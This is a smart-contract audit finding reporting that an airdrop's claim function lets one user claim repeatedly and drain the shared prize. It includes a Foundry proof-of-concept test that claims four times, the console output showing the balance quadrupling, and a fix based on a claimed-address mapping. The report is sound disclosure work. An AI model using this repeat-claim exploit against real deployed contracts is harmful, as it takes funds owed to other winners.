Summary
Users can claim the airdrop multiple times
Vulnerability Details
Users should only be able to claim the airdrop once, but the claim function makes no check against repeated calls, so a single user can execute it as many times as they like and collect the entire prize.
Impact
Only one of the winners will receive the funds that were supposed to be split among all of them; a single claimant can drain the whole prize and leave the other winners with nothing.
Tools Used
foundry
PoC (Foundry test; `token`, `airdrop`, `collectorOne`, `amountToCollect` and `proof` are the fixtures of the surrounding test contract):
function testUsersCanClaimMultipleTimes() public {
    uint256 startingBalance = token.balanceOf(collectorOne);
    // Fund the collector with enough ETH to pay the claim fee four times.
    vm.deal(collectorOne, airdrop.getFee() * 4);
    vm.startPrank(collectorOne);
    // Same account, same amount, same proof: every call succeeds.
    airdrop.claim{value: airdrop.getFee()}(
        collectorOne,
        amountToCollect,
        proof
    );
    console2.log("Now collector 1 has :", token.balanceOf(collectorOne));
    airdrop.claim{value: airdrop.getFee()}(
        collectorOne,
        amountToCollect,
        proof
    );
    console2.log("Now collector 1 has :", token.balanceOf(collectorOne));
    airdrop.claim{value: airdrop.getFee()}(
        collectorOne,
        amountToCollect,
        proof
    );
    console2.log("Now collector 1 has :", token.balanceOf(collectorOne));
    airdrop.claim{value: airdrop.getFee()}(
        collectorOne,
        amountToCollect,
        proof
    );
    vm.stopPrank();
    uint256 endingBalance = token.balanceOf(collectorOne);
    console2.log("Now collector 1 has :", token.balanceOf(collectorOne));
    // The collector ends up with four times the single allocation.
    assertEq(endingBalance - startingBalance, amountToCollect * 4);
}
Console output:
[PASS] testUsersCanClaimMultipleTimes() (gas: 123761)
Logs:
Now collector 1 has : 25000000
Now collector 1 has : 50000000
Now collector 1 has : 75000000
Now collector 1 has : 100000000
Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.79ms (543.70µs CPU time)
Recommendations
Add a mapping that records which addresses have already claimed, set the entry when an address claims its prize, and add a check at the start of the claim function that reverts if the address has already claimed. Update the mapping before transferring the tokens so that the check cannot be bypassed by re-entering the function during the transfer.